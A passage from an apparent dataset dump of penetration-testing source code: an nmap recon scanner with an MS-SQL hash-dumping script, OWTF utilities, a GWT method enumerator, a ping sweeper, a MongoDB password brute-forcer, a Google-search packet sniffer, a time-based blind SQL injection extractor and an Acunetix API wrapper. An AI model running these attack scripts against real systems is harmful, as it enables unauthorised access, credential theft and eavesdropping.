%s._nikto\" % (ip_address, port, ip_address)\n return\n\ndef httpsEnum(ip_address, port):\n print \"INFO: Detected https on \" + ip_address + \":\" + port\n print \"INFO: Performing nmap web script scan for \" + ip_address + \":\" + port \n HTTPSCANS = \"nmap -sV -Pn -vv -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-email-harvest,http-methods,http-method-tamper,http-passwd,http-robots.txt -oX /root/scripts/recon_enum/results/exam/%s_https.nmap %s\" % (port, ip_address, ip_address)\n results = subprocess.check_output(HTTPSCANS, shell=True)\n DIRBUST = \"./dirbust.py https://%s:%s %s\" % (ip_address, port, ip_address) # execute the python script\n subprocess.call(DIRBUST, shell=True)\n #NIKTOSCAN = \"nikto -host %s -p %s > %s._nikto\" % (ip_address, port, ip_address)\n return\n\ndef mssqlEnum(ip_address, port):\n print \"INFO: Detected MS-SQL on \" + ip_address + \":\" + port\n print \"INFO: Performing nmap mssql script scan for \" + ip_address + \":\" + port \n MSSQLSCAN = \"nmap -vv -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=1433,smsql.username-sa,mssql.password-sa -oX results/exam/nmap/%s_mssql.xml %s\" % (port, ip_address, ip_address)\n results = subprocess.check_output(MSSQLSCAN, shell=True)\n\ndef sshEnum(ip_address, port):\n print \"INFO: Detected SSH on \" + ip_address + \":\" + port\n SCRIPT = \"./sshrecon.py %s %s\" % (ip_address, port)\n subprocess.call(SCRIPT, shell=True)\n return\n\ndef snmpEnum(ip_address, port):\n print \"INFO: Detected snmp on \" + ip_address + \":\" + port\n SCRIPT = \"./snmprecon.py %s\" % (ip_address) \n subprocess.call(SCRIPT, shell=True)\n return\n\ndef smtpEnum(ip_address, port):\n print \"INFO: Detected smtp on \" + ip_address + \":\" + port\n if port.strip() == \"25\":\n SCRIPT = \"./smtprecon.py %s\" % (ip_address) \n subprocess.call(SCRIPT, shell=True)\n else:\n print \"WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)\" \n return\n\ndef smbEnum(ip_address, port):\n print \"INFO: Detected SMB on \" + ip_address + \":\" + port\n if port.strip() == \"445\":\n SCRIPT = \"./smbrecon.py %s 2>/dev/null\" % (ip_address)\n subprocess.call(SCRIPT, shell=True)\n return\n\ndef ftpEnum(ip_address, port):\n print \"INFO: Detected ftp on \" + ip_address + \":\" + port\n SCRIPT = \"./ftprecon.py %s %s\" % (ip_address, port) \n subprocess.call(SCRIPT, shell=True)\n return\n\ndef nmapScan(ip_address):\n ip_address = ip_address.strip()\n print \"INFO: Running general TCP/UDP nmap scans for \" + ip_address\n serv_dict = {}\n TCPSCAN = \"nmap -vv -Pn -A -sC -sS -T 4 -p- -oN '/root/scripts/recon_enum/results/exam/%s.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/%s_nmap_scan_import.xml' %s\" % (ip_address, ip_address, ip_address)\n UDPSCAN = \"nmap -vv -Pn -A -sC -sU -T 4 --top-ports 200 -oN '/root/scripts/recon_enum/results/exam/%sU.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/%sU_nmap_scan_import.xml' %s\" % (ip_address, ip_address, ip_address)\n results = subprocess.check_output(TCPSCAN, shell=True)\n udpresults = subprocess.check_output(UDPSCAN, shell=True)\n lines = results.split(\"\\n\")\n for line in lines:\n ports = []\n line = line.strip()\n if (\"tcp\" in line) and (\"open\" in line) and not (\"Discovered\" in line):\n\t while \" \" in line: \n line = line.replace(\" \", \" \");\n linesplit= line.split(\" \")\n service = linesplit[2] # grab the service name\n\t port = line.split(\" \")[0] # grab the port/proto\n if service in serv_dict:\n\t ports = serv_dict[service] # if the service is already in the dict, grab the port list\n\t \n ports.append(port) \n\t serv_dict[service] = ports # add service to the dictionary along with the associated port(2)\n \n # go through the service dictionary to call additional targeted enumeration functions \n for serv in serv_dict: \n ports = serv_dict[serv]\t\n if (serv == \"http\"):\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(httpEnum, ip_address, port)\n elif (serv == \"ssl/http\") or (\"https\" in serv):\n\t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(httpsEnum, ip_address, port)\n elif \"ssh\" in serv:\n\t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(sshEnum, ip_address, port)\n elif \"smtp\" in serv:\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(smtpEnum, ip_address, port)\n elif \"snmp\" in serv:\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(snmpEnum, ip_address, port)\n elif (\"domain\" in serv):\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(dnsEnum, ip_address, port)\n elif (\"ftp\" in serv):\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(ftpEnum, ip_address, port)\n elif \"microsoft-ds\" in serv:\t\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(smbEnum, ip_address, port)\n elif \"ms-sql\" in serv:\n \t for port in ports:\n\t port = port.split(\"/\")[0]\n\t multProc(httpEnum, ip_address, port)\n \n print \"INFO: TCP/UDP Nmap scans completed for \" + ip_address \n return\n\n# grab the discover scan results and start scanning up hosts\nprint \"############################################################\"\nprint \"#### RECON SCAN ####\"\nprint \"#### A multi-process service scanner ####\"\nprint \"#### http, ftp, dns, ssh, snmp, smtp, ms-sql ####\"\nprint \"############################################################\"\n \nif __name__=='__main__':\n f = open('results/exam/targets.txt', 'r') # CHANGE THIS!! grab the alive hosts from the discovery scan for enum\n for scanip in f:\n jobs = []\n p = multiprocessing.Process(target=nmapScan, args=(scanip,))\n jobs.append(p)\n p.start()\n f.close() \n"},"avg_line_length":{"kind":"number","value":46.82258064516129,"string":"46.822581"},"max_line_length":{"kind":"number","value":334,"string":"334"},"alphnanum_fraction":{"kind":"number","value":0.5979311895659996,"string":"0.597931"}}},{"rowIdx":138,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"YAML loaders and dumpers for PyYAML allowing to keep keys order.\nTaken from https://github.com/fmenabe/python-yamlordereddictloader.\n\"\"\"\n\nimport sys\nimport yaml\n\nif float(\"%d.%d\" % sys.version_info[:2]) < 2.7:\n from ordereddict import OrderedDict\nelse:\n from collections import OrderedDict\n\n\n#\n## Loaders\n#\ndef construct_yaml_map(self, node):\n data = OrderedDict()\n yield data\n value = self.construct_mapping(node)\n data.update(value)\n\n\ndef construct_mapping(self, node, deep=False):\n if isinstance(node, yaml.MappingNode):\n self.flatten_mapping(node)\n else:\n msg = \"expected a mapping node, but found %s\" % node.id\n raise yaml.constructor.ConstructError(None, None, msg, node.start_mark)\n\n mapping = OrderedDict()\n for key_node, value_node in node.value:\n key = self.construct_object(key_node, deep=deep)\n try:\n hash(key)\n except TypeError as err:\n raise yaml.constructor.ConstructError(\n \"while constructing a mapping\",\n node.start_mark,\n \"found unacceptable key (%s)\" % err,\n key_node.start_mark,\n )\n value = self.construct_object(value_node, deep=deep)\n mapping[key] = value\n return mapping\n\n\nclass Loader(yaml.Loader):\n\n def __init__(self, *args, **kwargs):\n yaml.Loader.__init__(self, *args, **kwargs)\n\n self.add_constructor(\"tag:yaml.org,2002:map\", type(self).construct_yaml_map)\n self.add_constructor(\"tag:yaml.org,2002:omap\", type(self).construct_yaml_map)\n\n construct_yaml_map = construct_yaml_map\n construct_mapping = construct_mapping\n\n\nclass SafeLoader(yaml.SafeLoader):\n\n def __init__(self, *args, **kwargs):\n yaml.SafeLoader.__init__(self, *args, **kwargs)\n\n self.add_constructor(\"tag:yaml.org,2002:map\", type(self).construct_yaml_map)\n self.add_constructor(\"tag:yaml.org,2002:omap\", type(self).construct_yaml_map)\n\n construct_yaml_map = construct_yaml_map\n construct_mapping = construct_mapping\n\n\n#\n## Dumpers\n#\ndef represent_ordereddict(self, data):\n return self.represent_mapping(\"tag:yaml.org,2002:map\", data.items())\n\n\nclass Dumper(yaml.Dumper):\n\n def __init__(self, *args, **kwargs):\n yaml.Dumper.__init__(self, *args, **kwargs)\n self.add_representer(OrderedDict, type(self).represent_ordereddict)\n\n represent_ordereddict = represent_ordereddict\n\n\nclass SafeDumper(yaml.SafeDumper):\n\n def __init__(self, *args, **kwargs):\n yaml.SafeDumper.__init__(self, *args, **kwargs)\n self.add_representer(OrderedDict, type(self).represent_ordereddict)\n\n represent_ordereddict = represent_ordereddict\n"},"avg_line_length":{"kind":"number","value":27.354166666666668,"string":"27.354167"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphnanum_fraction":{"kind":"number","value":0.6519661889011393,"string":"0.651966"}}},{"rowIdx":139,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\nowtf.api.utils\n~~~~~~~~~~~~~~\n\n\"\"\"\nfrom tornado.routing import Matcher\nfrom tornado.web import RequestHandler\n\n\nclass VersionMatches(Matcher):\n \"\"\"Matches path by `version` regex.\"\"\"\n\n def __init__(self, api_version):\n self.api_version = api_version\n\n def match(self, request):\n if self.api_version in request.path:\n return {}\n\n header_version = request.headers.get(\"X-API-VERSION\", None)\n if \"v{}\".format(header_version) in request.path:\n return {}\n\n return None\n\n\ndef _filter_headers(header_str, simple_headers):\n header_str = header_str.lower().replace(\" \", \"\").replace(\"\\t\", \"\")\n if not header_str:\n return set()\n\n header_set = set(value for value in header_str.split(\",\"))\n header_set.difference_update(simple_headers)\n header_set.difference_update(\"\")\n return header_set\n"},"avg_line_length":{"kind":"number","value":23.25,"string":"23.25"},"max_line_length":{"kind":"number","value":70,"string":"70"},"alphnanum_fraction":{"kind":"number","value":0.6204128440366973,"string":"0.620413"}}},{"rowIdx":140,"cells":{"repo_name":{"kind":"string","value":"GWT-Penetration-Testing-Toolset"},"text":{"kind":"string","value":"#!/usr/bin/env python\r\n\r\n'''\r\n\r\n GwtEnum v0.2\r\n Copyright (C) 2010 Ron Gutierrez\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n\r\n'''\r\n\r\nimport urllib2\r\nimport re\r\nimport pprint\r\nimport base64\r\nimport getpass\r\nfrom optparse import OptionParser\r\n\r\ndesc = \"A tool for enumerating GWT RPC methods\"\r\nmethods = []\r\nproxy_url = \"\"\r\nbasic_auth_encoded = \"\"\r\n \r\ndef get_global_val( varname, html_file ):\r\n for html_line in html_file:\r\n match = re.match( \".*,\" + re.escape(varname) +\r\n \"\\=\\'([A-Za-z0-9_\\.\\!\\@\\#\\$\\%\\^\\&\\*\\(\\)\" \r\n \"\\-\\+\\=\\:\\;\\\"\\|\\\\\\\\/\\?\\>\\,\\<\\~\\`]+)\\',\", html_line )\r\n if not match is None:\r\n return match.group(1)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = OptionParser( usage=\"usage: %prog [options]\", \r\n description=desc, \r\n version='%prog 0.10' )\r\n \r\n parser.add_option('-p', '--proxy', \r\n help=\"Proxy Host and Port (ie. -p \\\"http://proxy.internet.net:8080\\\")\", \r\n action=\"store\" )\r\n \r\n parser.add_option('-b', '--basicauth', \r\n help=\"User Basic Authentication ( Will be prompted for creds )\", \r\n action=\"store_true\" )\r\n \r\n parser.add_option('-k', '--cookies', \r\n help=\"Cookies to use when requesting the GWT Javascript Files (ie. -c \\\"JSESSIONID=AAAAAA\\\")\", \r\n action=\"store\")\r\n \r\n parser.add_option('-u', '--url', \r\n help=\"Required: GWT Application Entrypoint Javascript File (ie. *.nocache.js )\", \r\n action=\"store\")\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n if options.url is None:\r\n print( \"\\nMissing URL\\n\" )\r\n parser.print_help()\r\n exit()\r\n \r\n url = options.url\r\n gwt_docroot = '/'.join(url.split('/')[:-1])+'/'\t\r\n \r\n req = urllib2.Request(url)\r\n \r\n handlers = [ urllib2.HTTPHandler() ]\r\n \r\n if url.startswith( \"https://\" ):\r\n try:\r\n import ssl\r\n except ImportError:\r\n print \"SSL support not installed - exiting\"\r\n exit()\r\n \r\n handlers.append( urllib2.HTTPSHandler() )\r\n \r\n if options.proxy:\r\n handlers.append( urllib2.ProxyHandler( {'http':'http://'+options.proxy}) )\r\n \r\n opener = urllib2.build_opener(*handlers)\r\n urllib2.install_opener( opener )\r\n \r\n if options.basicauth:\r\n username = raw_input( \"Basic Auth Username: \" )\r\n password = getpass.getpass( \"Basic Auth Password: \" )\r\n basic_auth_encoded = base64.encodestring( '%s:%s' % (username, password) ).strip()\r\n req.add_header( \"Authorization\", \"Basic %s\" % basic_auth_encoded )\r\n \r\n if options.cookies:\r\n req.add_header( \"Cookie\", options.cookies )\r\n \r\n response = urllib2.urlopen(req)\r\n the_page = response.read()\r\n \r\n html_files = re.findall( \"([A-Z0-9]{30,35})\", the_page )\r\n if html_files is None:\r\n print( \"\\nNo Cached HTML Files found\\n\" )\r\n exit()\r\n \r\n all_rpc_files = []\r\n how_many_html_files_to_read = 1\r\n \r\n for html_file in html_files:\r\n if how_many_html_files_to_read == 0:\r\n break\r\n how_many_html_files_to_read -= 1\r\n\r\n async_error_mess = \"\"\r\n invoke_method = \"\"\r\n cache_html = \"%s%s.cache.html\" % (gwt_docroot, html_file )\r\n print( \"Analyzing %s\" % cache_html )\r\n \r\n req = urllib2.Request( cache_html )\r\n \r\n if options.cookies:\r\n req.add_header( \"Cookie\", options.cookies )\r\n \r\n if options.basicauth:\r\n req.add_header( \"Authorization\", \"Basic %s\" % basic_auth_encoded )\r\n \r\n try: \r\n response = urllib2.urlopen(req) \r\n except urllib2.HTTPError:\r\n print( \"404: Failed to Retrieve %s\" % cache_html )\r\n continue\r\n \r\n the_page = response.readlines()\r\n \r\n for line in the_page:\r\n \r\n # Service and Method name Enumeration\r\n rpc_method_match = re.match( \"^function \\w+\\(.*method\\:([A-Za-z0-9_\\$]+),.*$\", line )\r\n \r\n if rpc_method_match:\r\n if rpc_method_match.group(1) == \"a\":\r\n continue\r\n \r\n rpc_js_function = rpc_method_match.group(0).split(';')\r\n service_and_method = \"\"\r\n \r\n method_name = get_global_val( rpc_method_match.group(1), the_page )\r\n if method_name is None:\r\n continue\r\n \r\n methods.append( \"%s( \" % method_name.replace( '_Proxy.', '.' ) )\r\n \r\n # Parameter Enumeration\r\n for i in range(0, len(rpc_js_function)):\r\n try_match = re.match( \"^try{.*$\", rpc_js_function[i] )\r\n if try_match:\r\n i += 1\r\n func_match = re.match( \"^([A-Za-z0-9_\\$]+)\\(.*\", rpc_js_function[i] )\r\n payload_function = \"\"\r\n if func_match:\r\n payload_function = func_match.group(1)\r\n \r\n i += 1\r\n param_match = re.match( \"^\"+re.escape(payload_function)+\r\n \"\\([A-Za-z0-9_\\$]+\\.[A-Za-z0-9_\\$]+,([A-Za-z0-9_\\$]+)\\)\", \r\n rpc_js_function[i] )\r\n \r\n num_of_params = 0\r\n if param_match:\r\n num_of_params = int(get_global_val( param_match.group(1), the_page ))\r\n \r\n for j in range( 0, num_of_params ):\r\n i += 1\r\n \r\n param_var_match = re.match( \"^\"+re.escape(payload_function)+\r\n \"\\([A-Za-z0-9_\\$]+\\.[A-Za-z0-9_\\$]+,[A-Za-z0-9_\\$]+\\+\"\r\n \"[A-Za-z0-9_\\$]+\\([A-Za-z0-9_\\$]+,([A-Za-z0-9_\\$]+)\\)\\)$\", \r\n rpc_js_function[i] )\r\n \r\n if param_var_match:\r\n param = get_global_val( param_var_match.group(1), the_page )\r\n methods[-1] = methods[-1]+param+\",\"\r\n \r\n a_method = methods[-1][:-1]\r\n methods[-1] = a_method + \" )\"\r\n break\r\n \r\n line_decor = \"\\n===========================\\n\"\r\n print( \"\\n%sEnumerated Methods%s\" % ( line_decor, line_decor ) )\r\n methods = sorted(list(set(methods))) #uniq\r\n \r\n for method in methods:\r\n print( method )\r\n \r\n print( \"\\n\\n\" )\r\n"},"avg_line_length":{"kind":"number","value":35.90049751243781,"string":"35.900498"},"max_line_length":{"kind":"number","value":104,"string":"104"},"alphnanum_fraction":{"kind":"number","value":0.46871628910463864,"string":"0.468716"}}},{"rowIdx":141,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"import os\nimport platform\nfrom datetime import datetime\nnet = raw_input(\"Enter the Network Address \")\nnet1= net.split('.')\na = '.'\nnet2 = net1[0]+a+net1[1]+a+net1[2]+a\nst1 = int(raw_input(\"Enter the Starting Number \"))\nen1 = int(raw_input(\"Enter the Last Number \"))\nen1=en1+1\noper = platform.system()\n\nif (oper==\"Windows\"):\n\tping1 = \"ping -n 1 \"\nelif (oper== \"Linux\"):\n\tping1 = \"ping -c 1 \"\nelse :\n\tping1 = \"ping -c 1 \"\nt1= datetime.now()\nprint \"Scanning in Progress\"\nfor ip in xrange(st1,en1):\n\taddr = net2+str(ip)\n\tcomm = ping1+addr\n\tresponse = os.popen(comm)\n\tfor line in response.readlines():\n\t\tif(line.count(\"TTL\")):\n\t\t\tbreak\n\tif (line.count(\"TTL\")):\n\t\tprint addr, \"--> Live\" \n\t\t\nt2= datetime.now()\ntotal =t2-t1\nprint \"scanning complete in \" , total"},"avg_line_length":{"kind":"number","value":21.87878787878788,"string":"21.878788"},"max_line_length":{"kind":"number","value":50,"string":"50"},"alphnanum_fraction":{"kind":"number","value":0.6551724137931034,"string":"0.655172"}}},{"rowIdx":142,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\nowtf.protocols.smtp\n~~~~~~~~~~~~~~~~~~~\n\nDescription:\nThis is the OWTF SMTP handler, to simplify sending emails.\n\"\"\"\nfrom email.mime import base, multipart, text as mimetext\nfrom email import encoders\nimport logging\nimport os\nimport smtplib\n\nfrom owtf.utils.file import FileOperations, get_file_as_list\n\n__all__ = [\"smtp\"]\n\n\nclass SMTP(object):\n\n def __init__(self):\n self.msg_prefix = \"OWTF SMTP Client - \"\n\n def pprint(self, message):\n logging.info(self.msg_prefix + message)\n\n def create_connection_with_mail_server(self, options):\n return smtplib.SMTP(options[\"SMTP_HOST\"], int(options[\"SMTP_PORT\"]))\n\n def connect(self, options):\n try:\n mail_server = self.create_connection_with_mail_server(options)\n mail_server.ehlo()\n except Exception:\n self.pprint(\"Error connecting to {!s} on port {!s}\".format(options[\"SMTP_HOST\"], options[\"SMTP_PORT\"]))\n return None\n try:\n mail_server.starttls() # Give start TLS a shot\n except Exception as e:\n self.pprint(\"{} - Assuming TLS unsupported and trying to continue..\".format(str(e)))\n try:\n mail_server.login(options[\"SMTP_LOGIN\"], options[\"SMTP_PASS\"])\n except Exception as e:\n self.pprint(\"ERROR: {} - Assuming open-relay and trying to continue..\".format(str(e)))\n return mail_server\n\n def is_file(self, target):\n return os.path.isfile(target)\n\n def get_file_content_as_list(self, options):\n return get_file_as_list(options[\"EMAIL_TARGET\"])\n\n def build_target_list(self, options):\n \"\"\"Build a list of targets for simplification purposes.\"\"\"\n if self.is_file(options[\"EMAIL_TARGET\"]):\n target_list = self.get_file_content_as_list(options)\n else:\n target_list = [options[\"EMAIL_TARGET\"]]\n return target_list\n\n def send(self, options):\n num_errors = 0\n for target in self.build_target_list(options):\n target = target.strip()\n if not target:\n continue # Skip blank lines!\n self.pprint(\"Sending email for target: {!s}\".format(target))\n try:\n message = self.build_message(options, target)\n mail_server = self.connect(options)\n if mail_server is None:\n raise Exception(\"Error connecting to {}\".format(str(target)))\n mail_server.sendmail(options[\"SMTP_LOGIN\"], target, message.as_string())\n self.pprint(\"Email relay successful!\")\n except Exception as e:\n logging.error(\"Error delivering email: %s\", str(e))\n num_errors += 1\n return num_errors == 0\n\n def build_message(self, options, target):\n message = multipart.MIMEMultipart()\n for name, value in list(options.items()):\n if name == \"EMAIL_BODY\":\n self.add_body(message, value)\n elif name == \"EMAIL_ATTACHMENT\":\n self.add_attachment(message, value)\n else: # From, To, Subject, etc.\n self.set_option(message, name, value, target)\n return message\n\n def set_option(self, message, option, value, target):\n if option == \"EMAIL_FROM\":\n message[\"From\"] = value\n elif option == \"EMAIL_TARGET\":\n message[\"To\"] = target\n elif option == \"EMAIL_PRIORITY\":\n if value == \"yes\":\n message[\"X-Priority\"] = \" 1 (Highest)\"\n message[\"X-MSMail-Priority\"] = \" High\"\n elif option == \"EMAIL_SUBJECT\":\n message[\"Subject\"] = value\n\n def add_body(self, message, text):\n # If a file has been specified as Body, then set Body to file contents.\n if os.path.isfile(text):\n body = FileOperations.open(text).read().strip()\n else:\n body = text\n message.attach(mimetext.MIMEText(body, message))\n\n def add_attachment(self, message, attachment):\n if not attachment:\n return False\n binary_blob = base.MIMEBase(\"application\", \"octet-stream\")\n binary_blob.set_payload(FileOperations.open(attachment, \"rb\").read())\n encoders.encode_base64(binary_blob) # base64 encode the Binary Blob.\n # Binary Blob headers.\n binary_blob.add_header(\"Content-Disposition\", 'attachment; filename=\"{}\"'.format(os.path.basename(attachment)))\n message.attach(binary_blob)\n return True\n\n\nsmtp = SMTP()\n"},"avg_line_length":{"kind":"number","value":35.5,"string":"35.5"},"max_line_length":{"kind":"number","value":119,"string":"119"},"alphnanum_fraction":{"kind":"number","value":0.589171270718232,"string":"0.589171"}}},{"rowIdx":143,"cells":{"repo_name":{"kind":"string","value":"PenetrationTestingScripts"},"text":{"kind":"string","value":"#coding=utf-8\nimport time\nimport threading\nfrom printers import printPink,printRed,printGreen\nfrom multiprocessing.dummy import Pool\nimport pymongo\n\n\nclass mongodb_burp(object):\n\n def __init__(self,c):\n self.config=c\n self.lock=threading.Lock()\n self.result=[]\n self.lines=self.config.file2list(\"conf/mongodb.conf\")\n\n\n def mongoDB_connect(self,ip,username,password,port):\n crack=0\n try:\n connection=pymongo.Connection(ip,port)\n db=connection.admin\n db.collection_names()\n self.lock.acquire()\n printRed('%s mongodb service at %s allow login Anonymous login!!\\r\\n' %(ip,port))\n self.result.append('%s mongodb service at %s allow login Anonymous login!!\\r\\n' %(ip,port))\n self.lock.release()\n crack=1\n\n except Exception,e:\n if e[0]=='database error: not authorized for query on admin.system.namespaces':\n try:\n r=db.authenticate(username,password)\n if r!=False:\n crack=2\n else: \n self.lock.acquire()\n crack=3\n print \"%s mongodb service 's %s:%s login fail \" %(ip,username,password)\n self.lock.release() \n except Exception,e:\n pass\n\n else:\n printRed('%s mongodb service at %s not connect' %(ip,port))\n crack=4\n return crack\n\n\n\n def mongoDB(self,ip,port):\n try:\n for data in self.lines:\n username=data.split(':')[0]\n password=data.split(':')[1]\n flag=self.mongoDB_connect(ip,username,password,port)\n if flag in [1,4]:\n break\n\n if flag==2:\n self.lock.acquire()\n printGreen(\"%s mongoDB at %s has weaken password!!-------%s:%s\\r\\n\" %(ip,port,username,password))\n self.result.append(\"%s mongoDB at %s has weaken password!!-------%s:%s\\r\\n\" %(ip,port,username,password))\n self.lock.release()\n break\n except Exception,e:\n pass\n\n\n def run(self,ipdict,pinglist,threads,file):\n if len(ipdict['mongodb']):\n printPink(\"crack mongodb now...\")\n print \"[*] start crack mongodb %s\" % time.ctime()\n starttime=time.time()\n\n pool=Pool(threads)\n\n for ip in ipdict['mongodb']:\n pool.apply_async(func=self.mongoDB,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))\n\n pool.close()\n pool.join()\n print \"[*] stop mongoDB serice %s\" % time.ctime()\n print \"[*] crack mongoDB done,it has Elapsed time:%s \" % (time.time()-starttime)\n\n for i in xrange(len(self.result)):\n self.config.write_file(contents=self.result[i],file=file) \n\n\nif __name__ == '__main__':\n import sys\n sys.path.append(\"../\")\n from comm.config import *\n c=config()\n ipdict={'mongodb': ['112.90.23.158:27017']} \n pinglist=['192.168.1.1']\n test=mongodb_burp(c)\n test.run(ipdict,pinglist,50,file=\"../result/test\")\n\n\n\n"},"avg_line_length":{"kind":"number","value":32.1078431372549,"string":"32.107843"},"max_line_length":{"kind":"number","value":129,"string":"129"},"alphnanum_fraction":{"kind":"number","value":0.5050355450236966,"string":"0.505036"}}},{"rowIdx":144,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport optparse\nfrom scapy.all import *\n\n\ndef findGoogle(pkt):\n if pkt.haslayer(Raw):\n payload = pkt.getlayer(Raw).load\n if 'GET' in payload:\n if 'google' in payload:\n r = re.findall(r'(?i)\\&q=(.*?)\\&', payload)\n if r:\n search = r[0].split('&')[0]\n search = search.replace('q=', '').\\\n replace('+', ' ').replace('%20', ' ')\n print '[+] Searched For: ' + search\n\n\ndef main():\n parser = optparse.OptionParser('usage %prog -i '+\\\n '')\n parser.add_option('-i', dest='interface', \\\n type='string', help='specify interface to listen on')\n (options, args) = parser.parse_args()\n\n if options.interface == None:\n print parser.usage\n exit(0)\n else:\n conf.iface = options.interface\n\n try:\n print '[*] Starting Google Sniffer.'\n sniff(filter='tcp port 80', prn=findGoogle)\n except KeyboardInterrupt:\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n\n"},"avg_line_length":{"kind":"number","value":24.6046511627907,"string":"24.604651"},"max_line_length":{"kind":"number","value":59,"string":"59"},"alphnanum_fraction":{"kind":"number","value":0.509090909090909,"string":"0.509091"}}},{"rowIdx":145,"cells":{"repo_name":{"kind":"string","value":"Penetration-Testing-Study-Notes"},"text":{"kind":"string","value":"import requests\n\n\nchars = \"abcdefghijklmnopqrstuvwxyz123456789*!$#/|&\"\n\nfor n in range(10):\n\n\tfor i in range(1,21):\n\n\t\tfor char in chars:\n\t\t\tr = requests.get(\"https://domain/ajs.php?buc=439'and+(select+sleep(10)+from+dual+where+\\\n\t\t\t\tsubstring((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()\\\n\t\t\t\t+limit+\"+str(n)+\",1),\"+str(i)+\",1)+like+'\"+char+\"')--+-\")\n\n\n\t\t\tsecs = r.elapsed.total_seconds()\n\n\t\t\tif secs > 10:\n\t\t\t\tprint char,\n\n\tprint \"\\n\"\n"},"avg_line_length":{"kind":"number","value":20.59090909090909,"string":"20.590909"},"max_line_length":{"kind":"number","value":96,"string":"96"},"alphnanum_fraction":{"kind":"number","value":0.6455696202531646,"string":"0.64557"}}},{"rowIdx":146,"cells":{"repo_name":{"kind":"string","value":"PenetrationTestingScripts"},"text":{"kind":"string","value":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : jeffzhang\n# @Time : 18-5-22\n# @File : awvs_api.py\n# @Desc : \"\"\n\nimport time\nimport os\nimport json\nimport requests\nfrom flask import Flask\nfrom instance import config\n\n\nProductionConfig = config.ProductionConfig\napp = Flask(__name__)\napp.config.from_object(ProductionConfig)\n\nrequests.packages.urllib3.disable_warnings()\n\n\nclass AcunetixScanner:\n\n def __init__(self):\n self.api_key = app.config.get('AWVS_API_KEY')\n self.scanner_url = app.config.get('AWVS_URL')\n self.awvs_report_path = app.config.get('AWVS_REPORT_PATH')\n self.scan_result = {}\n self.all_tasks = []\n self.report_url = []\n self.headers = {\n \"X-Auth\": self.api_key,\n \"content-type\": \"application/json\"\n }\n\n def new_scan(self, target, desc):\n data = {\n \"address\": target,\n \"description\": desc,\n \"criticality\": \"10\"\n }\n try:\n response = requests.post(self.scanner_url + \"/api/v1/targets\", data=json.dumps(data),\n headers=self.headers, timeout=30, verify=False)\n return json.loads(response.content)['target_id']\n except Exception as e:\n print(target, e)\n return False\n\n def start_task(self, target, desc, profile_id):\n profile_id_list = {'0': '11111111-1111-1111-1111-111111111111', '1': '11111111-1111-1111-1111-111111111112',\n '2': '11111111-1111-1111-1111-111111111116', '3': '11111111-1111-1111-1111-111111111113',\n '4': '11111111-1111-1111-1111-111111111115', '5': '11111111-1111-1111-1111-111111111117'}\n profile_id = profile_id_list[profile_id]\n target_id = self.new_scan(target, desc)\n data = {\n \"target_id\": target_id,\n \"profile_id\": profile_id,\n \"schedule\": {\n \"disable\": False,\n \"start_date\": None,\n \"time_sensitive\": False\n }\n }\n try:\n response = requests.post(self.scanner_url + \"/api/v1/scans\", data=json.dumps(data),\n headers=self.headers, timeout=30, verify=False)\n return json.loads(response.content)\n except Exception as e:\n print(target, target_id, e)\n return False\n\n def get_all(self):\n try:\n response = requests.get(self.scanner_url + \"/api/v1/scans\", headers=self.headers, timeout=30, verify=False)\n results = json.loads(response.content)\n task_info = {}\n for task in results['scans']:\n task_info['scan_id'] = task['scan_id']\n task_info['target_id'] = task['target_id']\n task_info['address'] = task['target']['address']\n task_info['desc'] = task['target']['description']\n task_info['profile_name'] = task['profile_name']\n task_info['status'] = task['current_session']['status']\n task_info['vul_high'] = task['current_session']['severity_counts']['high']\n task_info['vul_medium'] = task['current_session']['severity_counts']['medium']\n task_info['vul_low'] = task['current_session']['severity_counts']['low']\n task_info['vul_info'] = task['current_session']['severity_counts']['info']\n task_info['start_date'] = task['current_session']['start_date'][0:19].replace('T', ' ')\n self.all_tasks.append(task_info)\n task_info = {}\n return self.all_tasks\n except Exception as e:\n raise e\n\n def delete_scan(self, scan_id):\n try:\n response = requests.delete(self.scanner_url + \"/api/v1/scans/\" + str(scan_id),\n headers=self.headers, timeout=30, verify=False)\n if response.status_code == 204:\n return True\n else:\n return False\n except Exception as e:\n print(scan_id, e)\n return False\n\n def delete_target(self, target_id):\n try:\n response = requests.delete(self.scanner_url + \"/api/v1/targets/\" + str(target_id),\n headers=self.headers, timeout=30, verify=False)\n if response.status_code == 204:\n 